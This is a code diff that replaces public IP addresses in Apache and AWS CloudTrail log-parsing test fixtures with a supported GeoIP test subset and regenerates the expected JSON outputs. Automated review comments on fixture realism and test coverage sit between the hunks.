+[16/Oct/2019:11:53:47 +0200] 89.160.20.156 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1" -
diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json
index 7380738243f..0964c3ba0d3 100644
--- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json
+++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json
@@ -34,7 +34,7 @@ "ip": "172.30.0.119" }, "event": { - "ingested": "2021-06-09T07:19:56.415692800Z", + "ingested": "2021-12-09T13:30:31.533065900Z", "original": "[10/Aug/2018:09:45:56 +0200] 172.30.0.119 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /nagiosxi/ajaxhelper.php?cmd=getxicoreajax\u0026amp;opts=%7B%22func%22%3A%22get_admin_tasks_html%22%2C%22args%22%3A%22%22%7D\u0026amp;nsp=b5c7d5d4b6f7d0cf0c92f9cbdf737f6a5c838218425e6ae21 HTTP/1.1\" 1375", "category": "web", "kind": "event",
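Review bot: The first ssl_request_log line is kept as unchanged context with a plain `&opts=` / `&nsp=`, yet the regenerated `event.original` for that same line reads `\u0026amp;opts=` and `\u0026amp;nsp=`, which suggests the fixture line on disk actually contains HTML-escaped `&amp;` while the rewritten second line round-trips as a raw `\u0026`. A genuine Apache ssl_request_log entry carries a raw `&`, so the escaped form looks like a copy-paste artifact from a rendered page rather than a real request. Since this fixture is already being rewritten, it would be worth normalising line 1 to `&opts=` / `&nsp=` and regenerating the expected file so both lines exercise the same decoding path. As far as the hunk shows this only affects fixture realism, not the pipeline itself.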
@@ -76,20 +76,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } }, - "address": "11.19.0.217", - "ip": "11.19.0.217" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-06-09T07:19:56.415712800Z", - "original": "[16/Oct/2019:11:53:47 +0200] 11.19.0.217 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /appl/ajaxhelper.php?cmd=getxicoreajax\u0026opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D\u0026nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1\" -", + "ingested": "2021-12-09T13:30:31.533074100Z", + "original": "[16/Oct/2019:11:53:47 +0200] 89.160.20.156 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /appl/ajaxhelper.php?cmd=getxicoreajax\u0026opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D\u0026nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1\" -", "category": "web", "kind": "event", "created": "2020-04-28T11:07:58.223Z" diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ubuntu.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ubuntu.log-expected.json index 2fbb9b5a50e..92c297c4b33 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ubuntu.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ubuntu.log-expected.json 
@@ -33,7 +33,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455415500Z", + "ingested": "2021-12-09T13:30:31.835525800Z", "original": "127.0.0.1 - - [26/Dec/2016:16:18:09 +0000] \"GET / HTTP/1.1\" 200 491 \"-\" \"Wget/1.13.4 (linux-gnu)\"", "category": "web", "kind": "event", @@ -88,7 +88,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455434900Z", + "ingested": "2021-12-09T13:30:31.835534600Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:00 +0000] \"GET / HTTP/1.1\" 200 484 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "category": "web", "kind": "event", @@ -146,7 +146,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455440100Z", + "ingested": "2021-12-09T13:30:31.835540100Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:00 +0000] \"GET /favicon.ico HTTP/1.1\" 404 504 \"http://192.168.33.72/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36\"", "category": "web", "kind": "event", @@ -203,7 +203,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455446300Z", + "ingested": "2021-12-09T13:30:31.835543600Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:08 +0000] \"GET / HTTP/1.1\" 200 484 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -261,7 +261,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455451Z", + "ingested": "2021-12-09T13:30:31.835548Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:08 +0000] \"GET /favicon.ico HTTP/1.1\" 404 504 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", 
@@ -319,7 +319,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455455300Z", + "ingested": "2021-12-09T13:30:31.835553700Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:08 +0000] \"GET /favicon.ico HTTP/1.1\" 404 504 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -376,7 +376,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455460900Z", + "ingested": "2021-12-09T13:30:31.835559600Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:10 +0000] \"GET /test HTTP/1.1\" 404 498 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -433,7 +433,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455465300Z", + "ingested": "2021-12-09T13:30:31.835563600Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:13 +0000] \"GET /hello HTTP/1.1\" 404 499 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -490,7 +490,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.455469600Z", + "ingested": "2021-12-09T13:30:31.835568100Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:17 +0000] \"GET /crap HTTP/1.1\" 404 499 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-vhost.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-vhost.log-expected.json index f1ae5d9b3f4..8b6a8cbbef2 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-vhost.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-vhost.log-expected.json 
@@ -36,7 +36,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.592388Z", + "ingested": "2021-12-09T13:30:33.387841500Z", "original": "vhost1.domaine.fr 192.168.33.2 - - [26/Dec/2016:16:22:14 +0000] \"GET /hello HTTP/1.1\" 404 499 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log index de56f84779d..b8120aacfdc 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log @@ -1,4 +1,4 @@ [Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico [Mon Dec 26 16:15:55.103786 2016] [core:notice] [pid 11379] AH00094: Command line: '/usr/local/Cellar/httpd24/2.4.23_2/bin/httpd' -[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 72.15.99.187] File does not exist: /usr/local/apache2/htdocs/favicon.ico -[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 123.123.123.123:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html +[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 89.160.20.156] File does not exist: /usr/local/apache2/htdocs/favicon.ico +[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 89.160.20.156:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json index 5d37a16cfd5..21df2d32d2f 100644 
--- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json @@ -19,7 +19,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.729116800Z", + "ingested": "2021-12-09T13:30:33.868254100Z", "original": "[Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico", "category": "web", "type": "error", @@ -48,7 +48,7 @@ "level": "notice" }, "event": { - "ingested": "2021-06-09T07:19:56.729153500Z", + "ingested": "2021-12-09T13:30:33.868263600Z", "original": "[Mon Dec 26 16:15:55.103786 2016] [core:notice] [pid 11379] AH00094: Command line: '/usr/local/Cellar/httpd24/2.4.23_2/bin/httpd'", "category": "web", "type": "info", @@ -72,25 +72,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-GA", - "city_name": "Newnan", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Georgia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -84.8154, - "lat": 33.3708 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 11693, + "number": 29518, "organization": { - "name": "WideOpenWest Finance LLC" + "name": "Bredband2 AB" } }, - "address": "72.15.99.187", - "ip": "72.15.99.187" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "message": "File does not exist: /usr/local/apache2/htdocs/favicon.ico", "tags": [ 
@@ -109,8 +109,8 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-06-09T07:19:56.729182700Z", - "original": "[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 72.15.99.187] File does not exist: /usr/local/apache2/htdocs/favicon.ico", + "ingested": "2021-12-09T13:30:33.868270Z", + "original": "[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 89.160.20.156] File does not exist: /usr/local/apache2/htdocs/favicon.ico", "category": "web", "type": "error", "timezone": "GMT+2", @@ -135,30 +135,30 @@ }, "source": { "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-BJ", - "city_name": "Beijing", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Beijing", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 116.3889, - "lat": 39.9288 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 4808, + "number": 29518, "organization": { - "name": "China Unicom Beijing Province Network" + "name": "Bredband2 AB" } }, - "address": "123.123.123.123", + "address": "89.160.20.156", "port": 12345, - "ip": "123.123.123.123" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-06-09T07:19:56.729191100Z", - "original": "[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 123.123.123.123:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html", + "ingested": "2021-12-09T13:30:33.868275800Z", + "original": "[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 89.160.20.156:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html", "category": "web", "type": "error", "timezone": "GMT+2", 
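Review bot: Both error events in this file now resolve to `89.160.20.156`, so the `source.geo` and `source.as` blocks added in this hunk are byte-identical to the ones added in the `@@ -72,25 +72,25 @@` hunk above, and the two `+[...]` lines in `test-error-basic.log` no longer differ by client address, only by the `:12345` port suffix. With the previous fixture (`72.15.99.187` versus `123.123.123.123`) a pipeline bug that copied one event's `source` enrichment onto the other would have failed the expected comparison; with a single shared address the only per-event difference left in `source` is `"port": 12345,`. Using a second address from the supported subset for the `[client IP:port]` line, e.g. `81.2.69.144` as the aws assume-role fixture in this commit does, would restore that separation without leaving the test database.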
diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-darwin.log-expected.json b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-darwin.log-expected.json index f0d917a08e8..15400a6c97a 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-darwin.log-expected.json +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-darwin.log-expected.json @@ -17,7 +17,7 @@ "level": "notice" }, "event": { - "ingested": "2021-06-09T07:19:56.788925900Z", + "ingested": "2021-12-09T13:30:34.149405700Z", "original": "[Mon Dec 26 16:15:55.103522 2016] [mpm_prefork:notice] [pid 11379] AH00163: Apache/2.4.23 (Unix) configured -- resuming normal operations", "category": "web", "type": "info", @@ -46,7 +46,7 @@ "level": "notice" }, "event": { - "ingested": "2021-06-09T07:19:56.788949700Z", + "ingested": "2021-12-09T13:30:34.149429600Z", "original": "[Mon Dec 26 16:15:55.103786 2016] [core:notice] [pid 11379] AH00094: Command line: '/usr/local/Cellar/httpd24/2.4.23_2/bin/httpd'", "category": "web", "type": "info", diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-trace.log-expected.json b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-trace.log-expected.json index 1d79fc8fdd3..7b5f6e1b4b1 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-trace.log-expected.json +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-trace.log-expected.json @@ -20,7 +20,7 @@ "level": "trace3" }, "event": { - "ingested": "2021-10-29T11:35:09.169407941Z", + "ingested": "2021-12-09T13:30:34.228018700Z", "original": "[Wed Oct 20 19:20:59.121211 2021] [rewrite:trace3] [pid 121591:tid 140413273032448] mod_rewrite.c(470): [client 10.121.192.8:38350] 10.121.192.8 - - [dev.elastic.co/sid#55a374e851c8][rid#7fb438083ac0/initial] applying pattern '^/import/?(.*)$' to uri '/'", "category": "web", "type": "info", 
diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-ubuntu.log-expected.json b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-ubuntu.log-expected.json index 3245ceac45a..92c843f5903 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-ubuntu.log-expected.json +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-ubuntu.log-expected.json @@ -12,7 +12,7 @@ "level": "notice" }, "event": { - "ingested": "2021-06-09T07:19:56.808481Z", + "ingested": "2021-12-09T13:30:34.283841100Z", "original": "[Mon Dec 26 16:17:53 2016] [notice] Apache/2.2.22 (Ubuntu) configured -- resuming normal operations", "category": "web", "type": "info", @@ -52,7 +52,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.808501500Z", + "ingested": "2021-12-09T13:30:34.283849400Z", "original": "[Mon Dec 26 16:22:00 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico, referer: http://192.168.33.72/", "category": "web", "type": "error", @@ -79,7 +79,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.808506500Z", + "ingested": "2021-12-09T13:30:34.283853Z", "original": "[Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico", "category": "web", "type": "error", @@ -110,7 +110,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.808510600Z", + "ingested": "2021-12-09T13:30:34.283857200Z", "original": "[Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico", "category": "web", "type": "error", @@ -141,7 +141,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.808514600Z", + "ingested": "2021-12-09T13:30:34.283862600Z", "original": "[Mon Dec 26 16:22:10 2016] [error] [client 192.168.33.1] File does not exist: /var/www/test", "category": "web", "type": "error", 
@@ -172,7 +172,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.808518300Z", + "ingested": "2021-12-09T13:30:34.283867900Z", "original": "[Mon Dec 26 16:22:13 2016] [error] [client 192.168.33.1] File does not exist: /var/www/hello", "category": "web", "type": "error", @@ -203,7 +203,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-06-09T07:19:56.808522100Z", + "ingested": "2021-12-09T13:30:34.283873300Z", "original": "[Mon Dec 26 16:22:17 2016] [error] [client 192.168.33.1] File does not exist: /var/www/crap", "category": "web", "type": "error", diff --git a/packages/apache/manifest.yml b/packages/apache/manifest.yml index aca322e0af2..b63f137bed4 100644 --- a/packages/apache/manifest.yml +++ b/packages/apache/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: apache title: Apache HTTP Server -version: 1.3.2 +version: 1.3.3 license: basic description: Collect logs and metrics from Apache servers with Elastic Agent. type: integration diff --git a/packages/aws/changelog.yml b/packages/aws/changelog.yml index f41d139c141..82002098a22 100644 --- a/packages/aws/changelog.yml +++ b/packages/aws/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.6.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.6.1" changes: - description: Fix the value of event.created in CloudTrail data stream. diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log index c2a4a5e884b..90e496fc0ff 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log 
@@ -1 +1 @@ -{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIN5ATK5U7KEXAMPLE:JohnRole1","arn":"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1","accountId":"111111111111","accessKeyId":"AKIAI44QH8DHBEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2019-10-02T21:50:54Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIN5ATK5U7KEXAMPLE","arn":"arn:aws:iam::111111111111:role/JohnRole1","accountId":"111111111111","userName":"JohnDoe"}}},"eventTime":"2019-10-02T22:12:29Z","eventSource":"sts.amazonaws.com","eventName":"AssumeRole","awsRegion":"us-east-2","sourceIPAddress":"123.145.67.89","userAgent":"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239","requestParameters":{"incomingTransitiveTags":{"Department":"Engineering"},"tags":[{"value":"johndoe@example.com","key":"Email"},{"value":"12345","key":"CostCenter"}],"roleArn":"arn:aws:iam::111111111111:role/JohnRole2","roleSessionName":"Role2WithTags","transitiveTagKeys":["Email","CostCenter"],"durationSeconds":3600},"responseElements":{"credentials":{"accessKeyId":"ASIAWHOJDLGPOEXAMPLE","expiration":"Oct 2, 2019 11:12:29 PM","sessionToken":"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"},"assumedRoleUser":{"assumedRoleId":"AROAIFR7WHDTSOYQYHFUE:Role2WithTags","arn":"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags"}},"requestID":"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE","eventID":"1917948f-3042-46ec-98e2-62865EXAMPLE","resources":[{"ARN":"arn:aws:iam::111122223333:role/JohnRole2","accountId":"111111111111","type":"AWS::IAM::Role"}],"eventType":"AwsApiCall","recipientAccountId":"111111111111"} 
+{"eventVersion":"1.05","userIdentity":{"type":"AssumedRole","principalId":"AROAIN5ATK5U7KEXAMPLE:JohnRole1","arn":"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1","accountId":"111111111111","accessKeyId":"AKIAI44QH8DHBEXAMPLE","sessionContext":{"attributes":{"mfaAuthenticated":"false","creationDate":"2019-10-02T21:50:54Z"},"sessionIssuer":{"type":"Role","principalId":"AROAIN5ATK5U7KEXAMPLE","arn":"arn:aws:iam::111111111111:role/JohnRole1","accountId":"111111111111","userName":"JohnDoe"}}},"eventTime":"2019-10-02T22:12:29Z","eventSource":"sts.amazonaws.com","eventName":"AssumeRole","awsRegion":"us-east-2","sourceIPAddress":"81.2.69.144","userAgent":"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239","requestParameters":{"incomingTransitiveTags":{"Department":"Engineering"},"tags":[{"value":"johndoe@example.com","key":"Email"},{"value":"12345","key":"CostCenter"}],"roleArn":"arn:aws:iam::111111111111:role/JohnRole2","roleSessionName":"Role2WithTags","transitiveTagKeys":["Email","CostCenter"],"durationSeconds":3600},"responseElements":{"credentials":{"accessKeyId":"ASIAWHOJDLGPOEXAMPLE","expiration":"Oct 2, 2019 11:12:29 PM","sessionToken":"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"},"assumedRoleUser":{"assumedRoleId":"AROAIFR7WHDTSOYQYHFUE:Role2WithTags","arn":"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags"}},"requestID":"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE","eventID":"1917948f-3042-46ec-98e2-62865EXAMPLE","resources":[{"ARN":"arn:aws:iam::111122223333:role/JohnRole2","accountId":"111111111111","type":"AWS::IAM::Role"}],"eventType":"AwsApiCall","recipientAccountId":"111111111111"} diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json index a5a1f8a53de..6231a4dd28d 100644 
--- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json
+++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json
@@ -13,27 +13,28 @@ }, "source": { "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-CQ", - "country_name": "China", - "region_name": "Chongqing", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 106.5531, - "lat": 29.5569 - }, - "country_iso_code": "CN" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 4837, + "number": 20712, "organization": { - "name": "CHINA UNICOM China169 Backbone" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "123.145.67.89", - "ip": "123.145.67.89" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "event": { - "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE:JohnRole1\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1\",\"accountId\":\"111111111111\",\"accessKeyId\":\"AKIAI44QH8DHBEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-10-02T21:50:54Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE\",\"arn\":\"arn:aws:iam::111111111111:role/JohnRole1\",\"accountId\":\"111111111111\",\"userName\":\"JohnDoe\"}}},\"eventTime\":\"2019-10-02T22:12:29Z\",\"eventSource\":\"sts.amazonaws.com\",\"eventName\":\"AssumeRole\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"123.145.67.89\",\"userAgent\":\"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 
botocore/1.12.239\",\"requestParameters\":{\"incomingTransitiveTags\":{\"Department\":\"Engineering\"},\"tags\":[{\"value\":\"johndoe@example.com\",\"key\":\"Email\"},{\"value\":\"12345\",\"key\":\"CostCenter\"}],\"roleArn\":\"arn:aws:iam::111111111111:role/JohnRole2\",\"roleSessionName\":\"Role2WithTags\",\"transitiveTagKeys\":[\"Email\",\"CostCenter\"],\"durationSeconds\":3600},\"responseElements\":{\"credentials\":{\"accessKeyId\":\"ASIAWHOJDLGPOEXAMPLE\",\"expiration\":\"Oct 2, 2019 11:12:29 PM\",\"sessionToken\":\"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\"},\"assumedRoleUser\":{\"assumedRoleId\":\"AROAIFR7WHDTSOYQYHFUE:Role2WithTags\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/test-role/Role2WithTags\"}},\"requestID\":\"b96b0e4e-e561-11e9-8b3f-7b396EXAMPLE\",\"eventID\":\"1917948f-3042-46ec-98e2-62865EXAMPLE\",\"resources\":[{\"ARN\":\"arn:aws:iam::111122223333:role/JohnRole2\",\"accountId\":\"111111111111\",\"type\":\"AWS::IAM::Role\"}],\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"111111111111\"}", + "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE:JohnRole1\",\"arn\":\"arn:aws:sts::111111111111:assumed-role/JohnDoe/JohnRole1\",\"accountId\":\"111111111111\",\"accessKeyId\":\"AKIAI44QH8DHBEXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"false\",\"creationDate\":\"2019-10-02T21:50:54Z\"},\"sessionIssuer\":{\"type\":\"Role\",\"principalId\":\"AROAIN5ATK5U7KEXAMPLE\",\"arn\":\"arn:aws:iam::111111111111:role/JohnRole1\",\"accountId\":\"111111111111\",\"userName\":\"JohnDoe\"}}},\"eventTime\":\"2019-10-02T22:12:29Z\",\"eventSource\":\"sts.amazonaws.com\",\"eventName\":\"AssumeRole\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"81.2.69.144\",\"userAgent\":\"aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 
botocore/1.12.239\",\"requestParameters\":{\"incomingTransitiveTags\":{\"Department\":\"Engineering\"},\"tags\":[{\"value\":\"johndoe@example.com\",\"key\":\"Email\"},{\"value\":\"12345\",\"key\":\"CostCenter\"}],\"roleArn\":\"arn:aws:iam::111111111111:role/JohnRole2\",\"roleSessionName\":\"Role2WithTags\",\"transitiveTagKeys\":[\"Email\",\"CostCenter\"],\"durationSeconds\":3600},\"responseElements\":{\"credentials\":{\"accessKeyId\":\"ASIAWHOJDLGPOEXAMPLE\",\"expiration\":\"Oct 2, 2019 11:12:29 